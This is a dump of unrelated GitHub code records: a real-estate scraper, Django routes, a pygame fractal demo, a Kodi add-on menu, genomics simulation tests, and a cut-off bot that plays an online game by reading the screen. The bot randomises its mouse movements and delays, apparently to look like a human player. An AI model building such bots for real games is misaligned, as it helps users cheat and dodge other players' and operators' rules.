after removing duplicates\")\n for i in range(len(property_links)):\n if i % 10 == 0:\n print('=', end='')\n print()\n counter = 0\n global status_codes\n global exceptions\n for link in property_links:\n try:\n counter += 1\n if counter % 10 == 0:\n print('.', end='')\n sys.stdout.flush()\n property_data = {}\n content = urlopen(Request(link, headers=hdr)).read()\n soup = bs4.BeautifulSoup(content, features=\"lxml\")\n header = soup.select('div[class*=\"property-content\"]')[0].select('h1')[0].contents[0]\n property_data['name'] = header\n details = soup.select('div[class*=\"property-details-sidebar\"]')[0]\n\n for listitem in details.select('ul')[0].select('li'):\n new_key = listitem.select('strong')[0].contents[0].replace(':', '').lower().replace(' ', '')\n if len(listitem.contents) > 1:\n new_value = str(listitem.contents[1]).strip()\n if new_value == 'Yes':\n new_value = True\n if new_value == 'No':\n new_value = False\n else:\n new_value = True\n property_data[new_key] = new_value\n\n property_data['pricehuf'] = details.select('ul')[1].select('li')[1].contents[0].split()[0].replace('.', '')\n if len(details.select('ul')[1].select('li')) > 2:\n property_data['priceeur'] = details.select('ul')[1].select('li')[2].contents[0].split()[0].replace('.',\n '')\n\n # property_data['contact'] = details.select('ul')[2].select('li')[1].contents[0]\n\n property_data['name'] = property_data['name'].lower()\n recognized_suffixes = ['utca', 'út', 'tér', 'park']\n recognized_suffixes_english = ['street', 'road', 'square', 'park']\n split_name = (str(property_data['name'])).split()\n for s in split_name:\n if s in recognized_suffixes or s in recognized_suffixes_english:\n if s in recognized_suffixes:\n property_data['streetsuffix'] = s\n if s in recognized_suffixes_english:\n property_data['streetsuffix'] = recognized_suffixes[recognized_suffixes_english.index(s)]\n split_name.remove(s)\n property_data['streetname'] = ' '.join(split_name)\n break\n\n property_data['size'] = int(property_data['size'].split(' ')[0])\n\n property_data_list.append(property_data)\n r = requests.post(\"https://propertybuddy-database.herokuapp.com/properties\", json=property_data)\n # r = requests.post(\"http://localhost:8080/properties\", json=property_data)\n\n latest_status_code = (r.status_code, json.loads(r.content)['message'])\n if latest_status_code in status_codes:\n status_codes[latest_status_code] += 1\n else:\n status_codes[latest_status_code] = 1\n except Exception as e:\n latest_exception = str(e)\n if \"HTTPSConnectionPool\" in latest_exception and \"Max retries exceeded with url\" in latest_exception:\n latest_exception = latest_exception.split(\"(Caused\")[0]\n if latest_exception in exceptions:\n exceptions[latest_exception] += 1\n else:\n exceptions[latest_exception] = 1\n print()\n print()\n print('all done')\n end_print()\n\n\ndef end_print():\n print('status codes:')\n for c in status_codes:\n print(\"\\t\" + str(c[0]) + \"\\tx\" + str(status_codes[c]) + \"\\n\\t\\t\" + str(c[1]))\n print('exceptions:')\n for e in exceptions:\n print(\"\\t\" + e + \"\\tx\" + str(exceptions[e]))\n\n\ntry:\n main()\nexcept KeyboardInterrupt:\n print()\n print()\n print('exiting on user interrupt')\n end_print()\n","repo_name":"zapathy/webscraping","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25697992927","text":"from django.urls import path\n\nfrom .views import OperationViewSet, CategoryView, CategoryListView, ListOperationsOfBill, FilterOperationsView, \\\n SearchView\n\nurlpatterns = [\n path('operation', OperationViewSet.as_view({\n 'post': 'create',\n 'delete': 'destroy',\n 'put': 'update',\n 'get': 'retrieve'\n })),\n path('operations', OperationViewSet.as_view({\n 'get': 'list'\n })),\n path('operations-of-bill', ListOperationsOfBill.as_view()),\n path('categories', CategoryListView.as_view({\n 'get': 'list'\n })),\n path('category', CategoryView.as_view({\n 'post': 'create'\n })),\n path('filter-operations', FilterOperationsView.as_view()),\n path('search', SearchView.as_view())\n]\n","repo_name":"bifenbecker/FinanceControl-bankAccounts","sub_path":"operations/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11075056089","text":"import pygame, sys, math\n\nclass observer:\n def __init__(self):\n self.observer_list = []\n\n def add(self, objs):\n self.observer_list += objs\n\n def notify(self, pos):\n for observer in self.observer_list:\n d = observer.on_notify(pos)\n if d: return d\n\n return None\n\n\nclass slider:\n def __init__(self, pos, name, tree):\n self.x, self.y = pos\n self.height = 200\n self.name = name\n self.rect_width, self.rect_height = 20, 10\n self.slide = pygame.Rect((self.x-10,self.y+self.height/2-self.rect_height/2),(self.rect_width, self.rect_height))\n self.degrees = math.degrees(math.pi*(self.slide.y - self.y+self.rect_height/2)/(self.height))\n self.trees = tree\n\n def on_notify(self, pos):\n if (abs(pos[0]-self.x)<20) and (self.y pos[1])):\n self.slide.move_ip(0, pos[1]-self.slide.y)\n self.degrees = math.degrees(math.pi*(self.slide.y - self.y+self.rect_height/2)/(self.height))\n if self.name == \"teta1\": return (self.trees.teta[0], -math.radians(self.degrees))\n else :return (math.radians(self.degrees),self.trees.teta[1])\n return None\n\n\n def draw(self, surface):\n myfont = pygame.font.SysFont(\"\", 15)\n textsurface = myfont.render(\n f\"{self.name} {round(self.degrees,2)}\", False, (0,0,0)\n )\n textRect = textsurface.get_rect()\n textRect.center = (self.x, self.y-10)\n surface.blit(textsurface, textRect)\n\n pygame.draw.line(surface, (0,0,0), (self.x, self.y), (self.x, self.y+self.height), 2)\n pygame.draw.rect(surface, (0,0,110), self.slide)\n\n\nclass tree:\n def __init__(self, size, k, teta):\n self.w, self.h = size\n self.lenght = 100\n self.k = k\n self.teta = teta\n self.max = 15\n\n def update(self, teta):\n if teta:\n self.teta = teta\n\n def draw(self, surface, line=None, angle=math.pi/2, it=1):\n if not line: line = [(self.w/2, self.h), (self.w/2, self.h*3/4)]\n if it > self.max: return 0\n if it> 7*self.max//10: pygame.draw.line(surface, (71,148,71),line[0], line[1])\n else: pygame.draw.line(surface, (102,51,0),line[0], line[1])\n\n for i in range(2):\n x = self.lenght*(self.k[i]**it)*math.cos(angle + self.teta[i]) + line[-1][0]\n y = -self.lenght*(self.k[i]**it)*math.sin(angle + self.teta[i]) + line[-1][1]\n self.draw(surface,[line[-1], (x,y)], angle+self.teta[i], it+1)\n\n\nclass main:\n\n def __init__(self):\n self._running = True\n self._display_surf = None\n self.size = (600, 500)\n\n def on_init(self):\n pygame.init()\n self._display_surf = pygame.display.set_mode(self.size, 0 , 32)\n self._running = True\n self.tree = tree(self.size, [0.65, 0.75], [math.radians(20), -math.radians(10)])\n self.sliders = [slider((490, 50), \"teta1\", self.tree), slider((560, 50), \"teta2\", self.tree)]\n self.observers = observer()\n self.observers.add(self.sliders)\n\n def on_event(self, event):\n if event.type == pygame.QUIT:\n self._running = False\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n degrees = self.observers.notify(pygame.mouse.get_pos())\n self.tree.update(degrees)\n self.on_loop()\n\n def on_loop(self):\n self._display_surf.fill((255,255,255))\n self.tree.draw(self._display_surf)\n for slider in self.sliders:\n slider.draw(self._display_surf)\n pygame.display.update()\n\n def on_render(self):\n pass\n\n def on_cleanup(self):\n pygame.quit()\n sys.exit()\n\n def on_execute(self):\n if self.on_init() == False:\n self._running = False\n\n self.on_loop()\n while ( self._running ):\n for event in pygame.event.get():\n self.on_event(event)\n self.on_render()\n self.on_cleanup()\n\nif __name__ == \"__main__\":\n theApp = main()\n theApp.on_execute()\n","repo_name":"MasMat2/Fractals","sub_path":"treegame.py","file_name":"treegame.py","file_ext":"py","file_size_in_byte":4091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30776906790","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Defines the StagedMoviesMenu class.\"\"\"\n\nimport xbmcgui\n\nfrom resources import ADDON_NAME\n\nfrom resources.lib.log import logged_function\n\nfrom resources.lib.misc import getstring\nfrom resources.lib.misc import notification\n\n\nclass StagedMoviesMenu():\n \"\"\"Provide windows for displaying staged movies, and tools for managing the items.\"\"\"\n\n # TODO: don't commit sql changes for \"... all\" until end\n # TODO: decorator for \"...all\" commands\n # TODO: load staged movies on init, use as instance variable, refresh as needed\n\n def __init__(self, database, progressdialog):\n \"\"\"__init__ StagedMoviesMenu.\"\"\"\n self.database = database\n self.progressdialog = progressdialog\n\n @logged_function\n def add_all(self, items):\n \"\"\"Add all staged movies to library.\"\"\"\n STR_ADDING_ALL_MOVIES = getstring(32042)\n STR_ALL_MOVIES_ADDED = getstring(32043)\n self.progressdialog.create_progressdialog(\n msg=STR_ADDING_ALL_MOVIES\n )\n for index, item in enumerate(items):\n self.progressdialog.update_progressdialog(\n index / len(items),\n item.title()\n )\n item.add_to_library()\n self.progressdialog.close_progressdialog()\n notification(STR_ALL_MOVIES_ADDED)\n\n @staticmethod\n def rename_dialog(item):\n \"\"\"Prompt input for new name, and rename if non-empty string.\"\"\"\n # TODO: move to utils or parent class so it's not duplicated\n input_ret = xbmcgui.Dialog().input(\n \"Title\",\n defaultt=item.title()\n )\n if input_ret:\n item.rename(input_ret)\n\n @logged_function\n def options(self, item):\n \"\"\"Provide options for a single staged movie in a dialog window.\"\"\"\n STR_ADD = getstring(32048)\n STR_REMOVE = getstring(32017)\n STR_REMOVE_AND_BLOCK = getstring(32049)\n STR_RENAME = getstring(32050)\n STR_STAGED_MOVIE_OPTIONS = getstring(32053)\n STR_BACK = getstring(32011)\n lines = [\n STR_ADD,\n STR_REMOVE,\n STR_REMOVE_AND_BLOCK,\n # STR_RENAME,\n STR_BACK\n ]\n ret = xbmcgui.Dialog().select(\n '{0} - {1} - {2}'.format(\n ADDON_NAME,\n STR_STAGED_MOVIE_OPTIONS,\n item.title),\n lines\n )\n if ret >= 0:\n if lines[ret] == STR_ADD:\n item.add_to_library()\n self.view_all()\n elif lines[ret] == STR_REMOVE:\n item.delete()\n self.view_all()\n elif lines[ret] == STR_REMOVE_AND_BLOCK:\n item.remove_and_block()\n self.view_all()\n elif lines[ret] == STR_RENAME:\n self.rename_dialog(item)\n self.options(item)\n elif lines[ret] == STR_BACK:\n return\n\n else:\n self.view_all()\n\n @logged_function\n def remove_all(self):\n \"\"\"Remove all staged movies.\"\"\"\n STR_REMOVING_ALL_MOVIES = getstring(32013)\n STR_ALL_MOVIES_REMOVED = getstring(32014)\n self.progressdialog.create_progressdialog(\n msg=STR_REMOVING_ALL_MOVIES\n )\n self.database.delete_item_from_table_with_status_or_showtitle(\n _type='movie',\n status='staged'\n )\n self.progressdialog.close_progressdialog()\n notification(STR_ALL_MOVIES_REMOVED)\n\n @logged_function\n def view_all(self):\n \"\"\"\n Display all staged movies, which are selectable and lead to options.\n\n Also provides additional options at bottom of menu.\n \"\"\"\n STR_NO_STAGED_MOVIES = getstring(32037)\n STR_ADD_ALL_MOVIES = getstring(32038)\n STR_REMOVE_ALL_MOVIES = getstring(32009)\n STR_BACK = getstring(32011)\n STR_STAGED_MOVIES = getstring(32004)\n staged_movies = list(\n self.database.get_content_items(\n status='staged',\n _type='movie'\n )\n )\n if not staged_movies:\n xbmcgui.Dialog().ok(ADDON_NAME, STR_NO_STAGED_MOVIES)\n return\n lines = [str(x) for x in staged_movies]\n lines += [\n STR_ADD_ALL_MOVIES,\n STR_REMOVE_ALL_MOVIES,\n STR_BACK\n ]\n ret = xbmcgui.Dialog().select(\n '{0} - {1}'.format(ADDON_NAME, STR_STAGED_MOVIES), lines\n )\n if ret >= 0:\n if ret < len(staged_movies): # staged item\n for i, item in enumerate(staged_movies):\n if ret == i:\n self.options(item)\n break\n elif lines[ret] == STR_ADD_ALL_MOVIES:\n self.add_all(staged_movies)\n elif lines[ret] == STR_REMOVE_ALL_MOVIES:\n self.remove_all()\n elif lines[ret] == STR_BACK:\n return\n","repo_name":"curdh/script.library.integration.tool","sub_path":"resources/lib/menus/staged_movies.py","file_name":"staged_movies.py","file_ext":"py","file_size_in_byte":5005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"7955729399","text":"import numpy as np\nimport pytest\nfrom pandas._testing import assert_frame_equal\n\nfrom pandas_genomics import sim\nfrom pandas_genomics.sim import BAMS, SNPEffectEncodings, PenetranceTables\n\n\ndef assert_frame_not_equal(*args, **kwargs):\n try:\n assert_frame_equal(*args, **kwargs)\n except AssertionError:\n # frames are not equal\n pass\n else:\n # frames are equal\n raise AssertionError\n\n\n@pytest.mark.parametrize(\n \"pen_table,baseline,diff,expected\",\n [\n (sim.PenetranceTables.NULL, 0.1, 0.8, [0.5] * 9),\n (sim.PenetranceTables.NULL, 0.0, 0.5, [0.25] * 9),\n (\n sim.PenetranceTables.HET_HET,\n 0.25,\n 0.5,\n [0.25, 0.25, 0.25, 0.25, 0.75, 0.25, 0.25, 0.25, 0.25],\n ),\n (\n np.array(sim.PenetranceTables.HET_HET.value).reshape((3, 3)) * 10,\n 0.25,\n 0.5,\n [0.25, 0.25, 0.25, 0.25, 0.75, 0.25, 0.25, 0.25, 0.25],\n ),\n (\n sim.PenetranceTables.HET_HA,\n 0.1,\n 0.9,\n [0.1, 0.1, 0.1, 0.1, 0.1, 1.0, 0.1, 0.1, 0.1],\n ),\n pytest.param(\n sim.PenetranceTables.HET_HET,\n -1,\n 0,\n [0.0] * 9,\n marks=pytest.mark.xfail(raises=ValueError, strict=True),\n ),\n pytest.param(\n sim.PenetranceTables.HET_HET,\n 0.1,\n 0.91,\n [0.0] * 9,\n marks=pytest.mark.xfail(raises=ValueError, strict=True),\n ),\n pytest.param(\n [0, 0, 0, 0, 0, 0, 0, 0, 0],\n 0.1,\n 0.91,\n [0.0] * 9,\n marks=pytest.mark.xfail(raises=ValueError, strict=True),\n ),\n ],\n)\ndef test_pen_table_direct(pen_table, baseline, diff, expected):\n \"\"\"Test calculation of final penetrance table when a penetrance table is specified\"\"\"\n model = BAMS(pen_table=pen_table, penetrance_base=baseline, penetrance_diff=diff)\n np.isclose(model.pen_table, np.reshape(np.array(expected), newshape=(3, 3))).all()\n\n\n@pytest.mark.parametrize(\n \"eff1,eff2,baseline,diff,main1,main2,interaction,expected\",\n [\n (\n sim.SNPEffectEncodings.DOMINANT,\n sim.SNPEffectEncodings.DOMINANT,\n 0.1,\n 0.8,\n 1,\n 1,\n 0,\n [0.1, 0.5, 0.5, 0.5, 0.9, 0.9, 0.5, 0.9, 0.9],\n ),\n (\n sim.SNPEffectEncodings.DOMINANT,\n sim.SNPEffectEncodings.DOMINANT,\n 0.1,\n 0.8,\n 0,\n 0,\n 1,\n [0.1, 0.1, 0.1, 0.1, 0.9, 0.9, 0.1, 0.9, 0.9],\n ),\n (\n sim.SNPEffectEncodings.DOMINANT,\n sim.SNPEffectEncodings.DOMINANT,\n 0.1,\n 0.8,\n 1,\n 1,\n 10,\n [0.1, 1 / 6, 1 / 6, 1 / 6, 0.9, 0.9, 1 / 6, 0.9, 0.9],\n ),\n (\n sim.SNPEffectEncodings.ADDITIVE,\n sim.SNPEffectEncodings.RECESSIVE,\n 0.2,\n 0.4,\n 1,\n 1,\n -1,\n [0.2, 0.4, 0.6, 0.2, 0.4, 0.6, 0.6, 0.6, 0.6],\n ),\n ],\n)\ndef test_pen_table_model(\n eff1, eff2, baseline, diff, main1, main2, interaction, expected\n):\n \"\"\"Test calculation of final penetrance table from a model\"\"\"\n model = BAMS.from_model(\n eff1=eff1,\n eff2=eff2,\n penetrance_base=baseline,\n penetrance_diff=diff,\n main1=main1,\n main2=main2,\n interaction=interaction,\n )\n assert np.isclose(\n model.pen_table, np.reshape(np.array(expected), newshape=(3, 3))\n ).all()\n\n\ndef test_random_seed():\n test_sim = BAMS.from_model(\n SNPEffectEncodings.RECESSIVE,\n SNPEffectEncodings.RECESSIVE,\n main1=1,\n main2=1,\n interaction=1,\n random_seed=123,\n )\n\n # Test simulating data using random seeds\n original_cc_sim = test_sim.generate_case_control(snr=0.1)\n original_quant_sim = test_sim.generate_quantitative(snr=0.1)\n repeat_cc_sim = test_sim.generate_case_control(snr=0.1)\n repeat_quant_sim = test_sim.generate_quantitative(snr=0.1)\n test_sim.set_random_seed(456)\n newseed_cc_sim = test_sim.generate_case_control(snr=0.1)\n newseed_quant_sim = test_sim.generate_quantitative(snr=0.1)\n test_sim.set_random_seed(123)\n redo_cc_sim = test_sim.generate_case_control(snr=0.1)\n redo_quant_sim = test_sim.generate_quantitative(snr=0.1)\n\n # Subsequent runs are different\n assert_frame_not_equal(original_cc_sim, repeat_cc_sim)\n assert_frame_not_equal(original_quant_sim, repeat_quant_sim)\n\n # New seed should be different\n assert_frame_not_equal(original_cc_sim, newseed_cc_sim)\n assert_frame_not_equal(original_quant_sim, newseed_quant_sim)\n\n # Resetting seed should match original\n assert_frame_equal(original_cc_sim, redo_cc_sim)\n assert_frame_equal(original_quant_sim, redo_quant_sim)\n\n\ndef test_null():\n bas = BAMS(PenetranceTables.NULL)\n simulated = bas.generate_case_control(10000, 1000, 0.1, 0.1)\n # maf should be similar to the specified one despite a large fraction of cases\n # specifically assert it is within 5%\n assert abs(0.1 - simulated[\"SNP1\"].genomics.maf) / 0.1 < 0.05\n","repo_name":"HallLab/pandas-genomics","sub_path":"tests/simulation/test_biallelic_sim.py","file_name":"test_biallelic_sim.py","file_ext":"py","file_size_in_byte":5297,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"32"} +{"seq_id":"8626666688","text":"import pyautogui\nimport cv2\nimport numpy as np\nimport time\nfrom Divers import Divers as divers\nimport random\nimport copy\n\ndef combat_fini():\n template = cv2.imread('Picture/fermer_combat.png', 0)\n template_BW = cv2.threshold(template, 100, 255, cv2.THRESH_BINARY)[1]\n image = pyautogui.screenshot(region=(571, 416, 90, 230))\n # image.show()\n img_rgb = cv2.cvtColor(np.array(image), cv2.COLOR_RGB2BGR)\n img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)\n img_BW = cv2.threshold(img_gray, 100, 255, cv2.THRESH_BINARY)[1]\n res2 = cv2.matchTemplate(img_BW, template_BW, cv2.TM_SQDIFF_NORMED)\n threshold = 0.1\n\n # Store the coordinates of matched area in a numpy array\n if np.any(res2 <= threshold):\n position = np.where(res2 <= threshold)\n result = (1, position[1][0]+571, position[0][0]+416)\n else:\n result = (0, 20, 20)\n return result\n\n\ndef click_combat_fini(pause=[False]):\n bool_fini = combat_fini()\n if bool_fini[0] == 1:\n divers.move_mouse(bool_fini[1], bool_fini[2], 60, 10, alea=False, pause=pause)\n\n\ndef findperso(color1, color2, color3, dist=10, tol=4):\n now = pyautogui.screenshot\n pos_nope = []\n while True:\n pos1 = divers.findcolor(color1, sauf=pos_nope, tol=tol)\n # print(pos1)\n # print(pos_nope)\n if pos1:\n if divers.findcolor(color2, initial=(pos1[0]-dist, pos1[1]-dist), final=(pos1[0]+dist, pos1[1]+dist), tol=tol):\n return pos1\n if divers.findcolor(color3, initial=(pos1[0]-dist, pos1[1]-dist), final=(pos1[0]+dist, pos1[1]+dist), tol=tol):\n return pos1\n pos_nope.append((pos1[0]-dist, pos1[1]-dist, pos1[0]+dist, pos1[1]+dist))\n else:\n break\n pos_nope = []\n while True:\n pos1 = divers.findcolor(color2, sauf=pos_nope, tol=tol)\n if pos1:\n if divers.findcolor(color3, initial=(pos1[0]-dist, pos1[1]-dist), final=(pos1[0]+dist, pos1[1]+dist), tol=tol):\n return pos1\n pos_nope.append((pos1[0]-dist, pos1[1]-dist, pos1[0]+dist, pos1[1]+dist))\n else:\n break\n return None\n\n\ndef obstacle(origine):\n dX = 2\n dY = 2\n color = (34, 51, 153)\n tol = 2\n\n color = np.uint8([[[color[0], color[1], color[2] ]]])\n hsv_color = cv2.cvtColor(color, cv2.COLOR_RGB2HSV)\n\n lower_limit = np.array([hsv_color[0][0][0]-tol, hsv_color[0][0][1]-tol, hsv_color[0][0][2]-tol])\n upper_limit = np.array([hsv_color[0][0][0]+tol, hsv_color[0][0][1]+tol, hsv_color[0][0][2]+tol])\n\n frame = pyautogui.screenshot()\n hsv = cv2.cvtColor(np.array(frame), cv2.COLOR_RGB2HSV)\n mask = cv2.inRange(hsv, lower_limit, upper_limit)\n\n height, width = mask.shape\n U = (28.2, 14)\n V = (28.2, -14)\n porte = 11\n obstacle_dico = {}\n for i in range(-porte, porte+1):\n porte2 = porte - abs(i)\n for j in range(-porte2, porte2 + 1):\n actuel = (np.int64(origine[0] + i * U[0] + j*V[0]), np.int64(origine[1] + i * U[1] + j*V[1]))\n zone_chercher = np.zeros((height, width, 1), np.uint8)\n initial = (actuel[0] - dX, actuel[1] - dY)\n final = (actuel[0] + dX, actuel[1] + dY)\n # print(initial,final)\n cv2.rectangle(zone_chercher, initial, final, (255), -1)\n res = cv2.bitwise_and(zone_chercher, zone_chercher, mask=mask)\n result1, result2 = np.where(res == 255)\n if(len(result1)):\n obstacle_dico[(i, j)] = True\n # else:\n # obstacle_dico[(i,j)] = False\n return obstacle_dico\n # frame2 = cv2.cvtColor(np.array(frame), cv2.COLOR_RGB2BGR)\n # for i in obstacle_dico.keys():\n # if obstacle_dico[i]:\n # actuel = (np.int64(origine[0] + i[0] * U[0] + i[1]*V[0]), np.int64(origine[1] + i[0] * U[1] + i[1]*V[1]))\n # cv2.rectangle(frame2,(actuel[0] - 2,actuel[1] - 2),(actuel[0] + 2,actuel[1] + 2),(255,255,255),-1)\n #\n # cv2.imshow('frame',frame2)\n # k = cv2.waitKey()\n\n\ndef findpath(obstacleexterne, pos, but):\n try:\n obstacle_dico = copy.deepcopy(obstacleexterne)\n obstacle_dico[but] = True\n libre = list(obstacle_dico.keys())\n if pos in libre:\n libre.remove(pos)\n list_pos_actuelle = [pos]\n list_pos_nouvelle = []\n dico_pos = {pos: 0}\n accessible = []\n for i in range(1, 31):\n for j in list_pos_actuelle:\n for k in voisin(j):\n if k in libre:\n libre.remove(k)\n dico_pos[k] = i\n list_pos_nouvelle.append(k)\n accessible.append(k)\n if not (but in libre):\n break\n list_pos_actuelle = list_pos_nouvelle\n list_pos_nouvelle = []\n\n pos_actuelle = but\n path = []\n if not (but in accessible):\n dist_min = 1000\n for i in accessible:\n if (abs(but[0]-i[0]) + abs(but[1]-i[1])) < dist_min:\n dist_min = (abs(but[0]-i[0]) + abs(but[1]-i[1]))\n pos_actuelle = i\n\n for i in range(dico_pos[pos_actuelle]-1, 0, -1):\n for j in voisin(pos_actuelle):\n try:\n if dico_pos[j] == i:\n path.append(j)\n pos_actuelle = j\n break\n except:\n continue\n return path\n except:\n path = []\n\n\ndef voisin(pos):\n return [(pos[0]+1, pos[1]), (pos[0]-1, pos[1]), (pos[0], pos[1]+1), (pos[0], pos[1]-1)]\n\ndef ligne_de_vue(obstacle, pos,but):\n try:\n obstacle_dico = copy.deepcopy(obstacle)\n obstacle_dico[pos] = True\n obstacle_dico[but] = True\n dist = abs(but[1]-pos[1]) + abs(but[0]-pos[0])\n if (but[0]-pos[0]) == 0:\n dX = np.arange(0, but[1]-pos[1], ((but[1]-pos[1])/dist))\n pente = (but[0]-pos[0])/(but[1]-pos[1])\n X = np.arange(pos[1], but[1], ((but[1]-pos[1])/dist))\n else:\n dX = np.arange(0, but[0]-pos[0], ((but[0]-pos[0])/dist))\n pente = (but[1]-pos[1])/(but[0]-pos[0])\n X = np.arange(pos[0], but[0], ((but[0]-pos[0])/dist))\n Y = []\n for i in dX:\n Y.append(pente*i + pos[1])\n\n # print(X)\n # print(Y)\n for i in range(len(X)):\n try:\n if (but[0]-pos[0]) == 0:\n obstacle_dico[(round(Y[i]), round(X[i]))]\n else:\n obstacle_dico[(round(X[i]), round(Y[i]))]\n except:\n return False\n return True\n except:\n return False\n\n\ndef pos_abs_2_rel(pos, origine):\n # U = (36.3, 18.1)\n # V = (36.3,-18.1)\n dX = 28.2\n dY = 14\n\n X = round((pos[0] - origine[0])/dX)\n Y = round((pos[1] - origine[1])/dY)\n\n a = (X + Y)/2\n b = X - a\n return (a,b)\n\ndef pos_rel_2_abs(pos, origine):\n U = (28.2, 14)\n V = (28.2, -14)\n pos_abs = (np.int64(origine[0] + pos[0] * U[0] + pos[1] * V[0]), np.int64(origine[1] + pos[0] * U[1] + pos[1] * V[1]))\n return pos_abs\n\ndef modeTacticCreature(pause= [False]):\n if(divers.findcolor((173, 173, 173),(872, 686),(879, 693))):\n divers.move_mouse(872, 686,6,7, vitesse=1.5, pause= pause)\n time.sleep(0.8 + random.random() * 0.5)\n\n if(divers.findcolor((173, 173, 173),(891, 686),(897, 693))):\n divers.move_mouse(891,686,6,7, vitesse=1.5, pause= pause)\n time.sleep(0.8 + random.random() * 0.5)\n return\n\ndef combat(option, pause= [False]):\n try:\n ColorNextTurn = (213, 243, 0)\n #cra = [(253, 190, 45),(216, 138, 22),(119, 74, 2)]#Couleur Enutrof\n cra = [(253, 57, 36), (196, 19, 0), (101, 11, 1)]#Couleur Cra\n creature = [(77, 77, 93), (46, 54, 61), (126, 126, 142)]\n Sort_Sans_Vue = (595, 667)\n Sort_Avec_Vue = (621, 667)\n PO_Sort = option.po\n pm = option.pm\n\n pos_ennemi = (0, 0)\n obst = {}\n if divers.findcolor(ColorNextTurn, (882, 646), (949, 669)):\n bool_fini = (1, 570, 433)\n modeTacticCreature()\n ColorEndFight = (191, 230, 0)\n pos_perso = findperso(cra[0], cra[1], cra[2])\n if (pos_perso == None):\n pos_perso = findperso(cra[0], cra[1], cra[2])\n origine = (pos_perso[0]+2, pos_perso[1]+15)\n\n while(True):\n modeTacticCreature()\n #lance le combat au premier tour et ensuite passe son tour\n for i in range(0, 20):\n time.sleep(0.3)\n if divers.findcolor(ColorNextTurn, (882, 646), (949, 669)):\n break\n if combat_fini()[0] == 1:\n i = 19\n bool_fini = combat_fini()\n break\n if ((i+1) % 10) == 0:\n divers.move_mouse(262, 694, 100, 4, alea=False, pause=pause)\n if i == 19:\n break\n\n divers.move_mouse(882, 646, 65, 20, alea=False, pause=pause)\n divers.move_mouse(1083, 388, 150, 160, alea=False, pause=pause)\n\n #attend son tour de jeu\n for i in range(0, 50):\n time.sleep(0.3)\n if divers.findcolor(ColorNextTurn, (882, 646), (949, 669)):\n break\n if combat_fini()[0] == 1:\n i = 49\n bool_fini = combat_fini()\n break\n if ((i + 1) % 15) == 0:\n divers.move_mouse(262, 694, 100, 4, alea=False, pause=pause)\n if i == 49:\n break\n\n #Click sort sans ligne de vue\n bool_sort = False\n if not(pos_ennemi in list(obst.keys())):\n bool_sort = True\n divers.move_mouse(Sort_Sans_Vue[0], Sort_Sans_Vue[1], 13, 14, vitesse=2, alea=False, pause=pause)\n divers.move_mouse(72, 146, 130, 450, Click=0, vitesse=3, alea=False, pause=pause)\n obst = obstacle(origine)\n # divers.move_mouse(70, 475, 100, 230, vitesse = 2, pause= pause)\n\n pos_perso = findperso(cra[0], cra[1], cra[2])\n if pos_perso == None:\n pos_perso = findperso(cra[0], cra[1], cra[2])\n\n pos_ennemi = findperso(creature[0], creature[1], creature[2])\n if pos_ennemi == None:\n pos_ennemi = findperso(creature[0], creature[1], creature[2])\n if pos_ennemi == None:\n break\n pos_perso = (pos_perso[0]+2, pos_perso[1] + 19)\n pos_ennemi = (pos_ennemi[0]+2, pos_ennemi[1] + 19)\n pos_perso = pos_abs_2_rel(pos_perso, origine)\n pos_ennemi = pos_abs_2_rel(pos_ennemi, origine)\n\n dist = abs(pos_perso[0]-pos_ennemi[0]) + abs(pos_perso[1]-pos_ennemi[1])\n # if too far, get closer\n if dist > PO_Sort:\n # enleve click sort pour bouger\n if bool_sort:\n bool_sort = False\n divers.move_mouse(72, 146, 130, 450, vitesse=2, pause= pause)\n path = findpath(obst, pos_perso, pos_ennemi)\n if len(path) < pm:\n pm = len(path)\n Go_to = pos_rel_2_abs(path[len(path)-pm], origine)\n divers.move_mouse(Go_to[0]-6, Go_to[1]-4, 6, 6, vitesse=2, pause=pause)\n pos_perso = path[len(path)-5]\n dist = abs(pos_perso[0]-pos_ennemi[0]) + abs(pos_perso[1]-pos_ennemi[1])\n\n if dist <= PO_Sort:\n if ligne_de_vue(obst, pos_perso, pos_ennemi):\n Go_to = pos_rel_2_abs(pos_ennemi, origine)\n\n divers.move_mouse(Sort_Avec_Vue[0], Sort_Avec_Vue[1], 13, 14, alea=False, vitesse=2, pause=pause)\n divers.move_mouse(Go_to[0]-6, Go_to[1]-4, 9, 6, alea=False, vitesse=2, pause=pause)\n\n time.sleep(0.3 + random.random() * 0.3)\n if combat_fini()[0] == 1:\n bool_fini = combat_fini()\n break\n\n divers.move_mouse(Sort_Avec_Vue[0], Sort_Avec_Vue[1], 13, 14, alea=False, vitesse=2, pause=pause)\n if combat_fini()[0] == 1:\n bool_fini = combat_fini()\n break\n divers.move_mouse(Go_to[0]-6, Go_to[1]-4, 9, 6, vitesse=2, pause= pause)\n # Sort à ligne de vue\n # 2e sort à ligne de vue\n else:\n Go_to = pos_rel_2_abs(pos_ennemi,origine)\n if (not(bool_sort)):\n divers.move_mouse(Sort_Sans_Vue[0], Sort_Sans_Vue[1], 13, 14,alea=False, vitesse=2, pause= pause)\n divers.move_mouse(Go_to[0]-6, Go_to[1]-4, 9, 6, alea=False, vitesse=2, pause=pause)\n\n time.sleep(0.3 + random.random() * 0.3)\n if combat_fini()[0] == 1:\n bool_fini = combat_fini()\n break\n\n divers.move_mouse(Sort_Sans_Vue[0], Sort_Sans_Vue[1], 13, 14, alea=False, vitesse=2, pause=pause)\n if combat_fini()[0] == 1:\n bool_fini = combat_fini()\n break\n divers.move_mouse(Go_to[0]-6, Go_to[1]-4, 9, 6, vitesse=2, pause=pause)\n\n time.sleep(0.3 + random.random() * 0.3)\n divers.move_mouse(bool_fini[1], bool_fini[2], 60, 10, alea=False, pause=pause)\n except:\n 